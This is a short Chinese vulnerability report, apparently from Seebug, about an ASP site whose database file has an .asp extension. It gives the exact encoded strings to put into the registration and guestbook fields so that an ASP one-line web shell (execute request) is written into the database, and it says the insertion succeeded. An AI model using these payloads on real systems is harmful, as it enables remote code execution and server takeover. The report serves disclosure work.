### 简要描述:
数据库默认为asp后缀,提供了插一句话的前提,用错误代码方式防止数据库下载,但是可以注释掉错误代码
### 详细说明:
记事本打开数据库看了下这串代码的大概位置,然后就开始找地方插一句话。
注册一个帐号,
注册信息时随便找个地方填入 ┳>
原型为 3%>
然后再到留言处留言,标题填写 ┼攠數畣整爠煥敵瑳∨∣┩愾┼砧
原型为 <% execute request("#")%>a<%'x
打开数据库地址查看报错方式,
以成功插入一句话
[<img src="https://images.seebug.org/upload/201312/281825388baaf113ebf5f5c44d29cd30bb1f03f5.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/281825388baaf113ebf5f5c44d29cd30bb1f03f5.jpg)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201312/2818262794d3e1549ee89de9fe0bc5b74818e844.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/2818262794d3e1549ee89de9fe0bc5b74818e844.jpg)
测试官网当前版本
京公网安备 11010502034610号
暂无评论